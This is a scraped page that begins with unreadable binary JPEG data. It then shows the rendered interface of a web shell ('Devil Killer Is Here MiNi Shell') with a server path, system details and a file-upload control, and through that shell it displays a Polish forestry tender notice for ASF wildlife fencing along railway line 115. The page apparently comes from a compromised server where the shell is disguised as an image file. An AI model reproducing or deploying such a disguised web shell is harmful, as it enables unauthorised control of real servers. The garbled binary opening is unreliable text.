JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211122/0027834201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających migrację dzikich zwierząt, potencjalnych nosicieli ASF – III postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545553</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szarwarska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dabrowatar@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dabrowa.krakow.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających migrację dzikich zwierząt, potencjalnych nosicieli ASF – III postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0424b76-4b89-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00278342</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_dabrowa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy<br/>https://platformazakupowa.pl/pn/lasy_dabrowa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z platformy https://platformazakupowa.pl/strona/1-<br/>regulamin, stanowiącym załącznik nr 9 do SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowychjest Nadleśnictwo Dąbrowa Tarnowska. Administrator z którym w sprawach dotyczących<br/>przetwarzania<br/>danych osobowych można skontaktować się telefonicznie pod numerem 668 489 563 lub za<br/>pośrednictwem poczty elektronicznej na adres: udodo@lasy.gov.pl.2. Zamawiający przetwarza dane<br/>osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. 3. Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. 4. Do przetwarzaniadanych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby<br/>posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do<br/>zachowania ich w poufności 5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.<br/>93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.6. Odbiorcami danych<br/>osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o art. 8-8a oraz 96 ust. 3-3b PZP.7. Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art.<br/>97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy w sprawie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SI.270.46.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie zadania „Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów –<br/>Szczucin) – od autostrady A4 do Szczucina, ograniczających lub zatrzymujących migrację dzikich zwierząt,<br/>potencjalnych nosicieli ASF – III postępowanie” .<br/>Przedmiot zamówienia obejmuje Pakiet I – odcinek Szczucin – Mędrzechów – 10,900 km<br/>2. Miejscem realizacji przedmiotu zamówienia będzie teren linii kolejowej nr 115 Tarnów – Szczucin od<br/>autostrady A4 do Szczucina. W poprzednich dwóch postępowaniach wyłoniono wykonawcę na budowę<br/>ogrodzenia na odcinku od autostrady A4 do Mędrzechowa (Pakiet II, III oraz IV). Obecnie w III-cim<br/>postępowaniu chcemy znaleźć wykonawcę budowy ogrodzenia na odcinku Mędrzechów – Szczucin.<br/>3. Zakresy rzeczowe przedmiotu zamówienia określa przedmia robót sporządzony oddzielnie dla części<br/>(Pakiet I), który jest załącznikiem do niniejszego SWZ. Ma on charakter szacunkowy. Rozliczenie robót będzie<br/>dokonane powykonawczo, wg faktycznej ilości wykonanych robót.<br/>4. Ogólny standard technologii prac obejmuje:<br/>a) Przygotowanie powierzchni do montażu ogrodzenia przez zmulczowanie roślinności (porosty, krzewy<br/>i pojedyncze drzewa) pasem o szerokości min. ok. 2,50 + 2,0m (korona nasypu plus skarpa) co będzie<br/>utrudnione z powodu szyn, które znajdują się w gąszczu krzaków. Linia kolejowa na tym odcinku nie jest<br/>użytkowana od ok. 25 lat<br/>b) Dostarczenie materiałów do miejsca wbudowania. Zamawiający dostarczy i przekaże poszczególnym<br/>Wykonawcom słupy sosnowe dł. 2,50m, średnicy 12-18cm oraz siatkę leśną 160cm na składach<br/>zlokalizowanych na placach po byłych stacjach kolejowych w Szczucinie i Mędrzechowie. Transport<br/>technologiczny z tych składów do miejsc wbudowania obciążać będzie Wykonawcę.<br/>c) Wykonanie otworów na słupki o głębokości min. 0,60m w odległościach co ok. 4,0m (dopuszczalna<br/>odchyłka +/- 0,5m w zależności od warunków terenowych).<br/>d) Ustawienie słupów, obsypanie gruntem z ukopu, ubicie zasypu.<br/>e) Rozwinięcie, zawieszenie , napięcie i przymocowanie siatki do słupów oraz dołem do drutu nośnego.<br/>f) Zabezpieczenie słupów przed wychylaniem poprzez wykonanie ukośnych podpór, zagłębionych dołem w gruncie i przybitych w zaciosie do słupa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, polegających<br/>na powtórzeniu tego samego rodzaju zamówień zgodnie z art. 214 ust. 1 pkt 7 ustawy Prawo<br/>zamówień publicznych tj. w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia<br/>podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień<br/>uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających<br/>na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w<br/>trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane<br/>w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia<br/>podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi<br/>kryteriami:<br/>a) Cena wykonania zamówienia – 60 %<br/>Oferta z najniższą ceną otrzyma maksymalną ilość punktów = 60 pkt, oferty następne będą oceniane<br/>na zasadzie proporcji w stosunku do oferty najtańszej wg wzoru:C = [C min / C bad] x 60<br/>gdzie:<br/>C - liczba punktów za cenę ofertową<br/>C min - najniższa cena ofertowa spośród ofert badanych<br/>C bad - cena oferty badanej<br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego<br/>miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/>b) Kryterium „Skrócenie terminu realizacji ” – 40%<br/>Zamawiający przyzna punkty w tym kryterium wg poniższych warunków:<br/>Maksymalny termin wykonania – 60 dni od daty zawarcia umowy<br/>- za skrócenie tego terminu o 5 dni Zamawiający przyzna 10 pkt,<br/>- za skrócenie tego terminu o 10 dni Zamawiający przyzna 20 pkt<br/>- za skrócenie tego terminu o 15 dni Zamawiający przyzna 30 pkt<br/>- za skrócenie tego terminu o 20 dni Zamawiający przyzna 40 pkt<br/>Ocena oferty w ramach tego kryterium, zostanie dokonana na podstawie oświadczenia Wykonawcy<br/>złożonego w formularzu oferty. W przypadku braku wskazania w formularzu oferty oświadczenia w<br/>zakresie „Skrócenie terminu realizacji”, Zamawiający przyjmie do oceny maksymalny 60 dniowy termin<br/>realizacji zamówienia i przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>Oferty Wykonawców, którzy zaoferują okres realizacji zamówienia inny niż mieszczący się w przedziale<br/>40-60 dni zostaną odrzucone jako niezgodne z treścią SWZ.<br/>Zamawiający w celu ustalenia, czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu<br/>zamówienia, zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących<br/>elementów oferty mających wpływ na wysokość ceny.<br/>Zamawiający, oceniając wyjaśnienia, weźmie pod uwagę obiektywne czynniki, w szczególności<br/>oszczędność metody wykonania zamówienia, wybrane rozwiązania techniczne, wyjątkowo sprzyjające<br/>warunki wykonywania zamówienia dostępne dla Wykonawcy, oryginalność projektu Wykonawcy oraz<br/>wpływ pomocy publicznej udzielonej na podstawie odrębnych przepisów.<br/>Zamawiający odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena<br/>wyjaśnień wraz z dostarczonymi dowodami potwierdzi, że oferta zawiera rażąco niską cenę w<br/>stosunku do przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie publiczne mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu<br/>dotyczące:<br/>1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych<br/>przepisów.<br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie<br/>2) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie<br/>3) zdolności technicznej lub zawodowej;<br/>Zamawiający wymaga:<br/>a) aby Wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie - co najmniej dwie roboty budowlane których wartość<br/>wynosiła co najmniej 100 000,00 PLN brutto każda.<br/>b) aby Wykonawca skierował do realizacji zamówienia publicznego osoby odpowiedzialne za kierowanie<br/>robotami budowlanymi, tj. minimum:<br/>- jedną osobę – Kierownika budowy - posiadającego uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno – budowlanej.<br/>Osoba powyższa musi posiadać niezbędne do wykonania zamówienia kwalifikacje zawodowe, tj.<br/>uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 roku – Prawo budowlane<br/>(Dz. U. z 2020 r., poz. 1333 z późn. zm. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz ofertowy (wzór – zał. nr 1)<br/>2) Kosztorys szczegółowy z zestawieniami robocizny, materiałów i pracy sprzętu sporządzony na<br/>podstawie przedmiarów robót.<br/>3) Odpis z właściwego rejestru działalności gospodarczej lub inny dokument potwierdzający dane firmy<br/>oraz dane osób uprawnionych do jej reprezentowania lub podanie numeru KRS albo CEIDG.<br/>4) Pełnomocnictwo /oryginał/osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie<br/>wynika bezpośrednio z załączonych dokumentów,<br/>5) W przypadku złożenia oferty wspólnej– pełnomocnictwo udzielone liderowi,<br/>6) Zobowiązanie podmiotu trzeciego do udostępnienia zasobów (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej dla Pakietów:<br/>dla Pakietu I ………………………..w wysokości 3.500,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że<br/>poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz.<br/>299.).<br/>3. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego w banku<br/>Bank Ochrony Środowiska S.A./O Tarnów nr rachunku: 26 1540 1203 2001 4288 5506 0001 z dopiskiem: wadium<br/>na zabezpieczenie oferty w postępowaniu na „Budowa ogrodzenia p/ASF – III postępowanie – pakiet nr I”.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku<br/>bankowym Zamawiającego.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie<br/>zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu<br/>pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy<br/>przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną<br/>część zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie<br/>wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie<br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich<br/>siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie 